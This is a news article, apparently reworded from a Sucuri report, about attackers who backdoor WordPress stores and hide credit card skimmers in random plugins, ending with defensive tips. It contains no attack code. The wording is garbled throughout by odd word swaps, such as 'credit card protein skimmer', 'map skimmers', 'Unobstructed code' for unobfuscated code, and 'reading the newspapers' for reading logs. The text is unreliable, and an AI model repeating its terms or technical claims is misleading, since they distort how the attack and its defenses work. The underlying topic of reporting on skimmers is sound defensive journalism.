Hackers infect random WordPress plugins to steal credit cards

Credit card readers are injected into random plugins of WordPress ecommerce sites, hiding from detection while stealing payment details from customers.

As the Christmas shopping season is in full swing, malicious card theft players are stepping up their efforts to infect online stores with stealthy skimmers, so admins need to remain vigilant.

The latest trend is to inject map skimmers into WordPress plugin files, avoiding the tightly watched main “wp-admin” and “wp-includes” directories where most injections are short lived.

Hiding in plain sight

According to a new report from Sucuri, hackers with credit card thefts first hack WordPress sites and inject a backdoor into the website for persistence.

These backdoors allow hackers to retain access to the site, even if the administrator installs the latest security updates for WordPress and installed plugins.

When attackers use the backdoor in the future, it will look for a list of administrator users and use their authorization cookie and the current user’s login to access the site.

Backdoor injection on site files
Backdoor injection on site files
Source: Sucuri

Malicious actors then add their malicious code to random plugins and, according to Sucuri, many scripts are not even obfuscated.

Adding code to the plugin
Unobstructed code additions to a plugin
Source: Sucuri

However, upon reviewing the code, analysts noticed that an image optimization plugin contained references to WooCommerce and included undefined variables. This plugin does not present any vulnerability and would have been selected at random by the actors of the threat.

Using PHP ‘get_defined_vars()‘, Sucuri was able to discover that one of these undefined variables refers to a domain hosted on an Alibaba server in Germany.

This domain was unrelated to the compromised website they were looking for, which does business in North America.

The same site had a second injection on the 404 page plugin, which contained the real credit card protein skimmer using the same approach of variables hidden in unobscured code.

In this case, it is’$thelist' and ‘$message' variables were used to support the credit card skimming malware, the first referring to the receiving URL and the second using ‘file_get_contents()' to retrieve payment details.

Variable protein skimmer functionality
Variable protein skimmer functionality
Source: Sucuri

How to protect yourself against card skimmers

There are several safeguards that administrators can take to keep their sites skimmer free or to minimize infection times as much as possible.

First, the wp-admin area should be restricted to specific IP addresses. Then, even if a backdoor is injected, actors would not be able to access the site even if they stole the administrator’s cookies.

Second, file integrity monitoring through active server-side scanners should be implemented on the website, ensuring that no code changes go unnoticed for a long time.

Finally, get into the habit of reading the newspapers and looking deeply into the details. For example, file changes, themes, or plugin updates are always reflected in the logs.

Previous SonicWall 'Strongly Urges' Customers to Fix Critical SMA 100 Bugs
Next Warzone Pacific Bugs and Crashes: Common Problems and How to Fix Them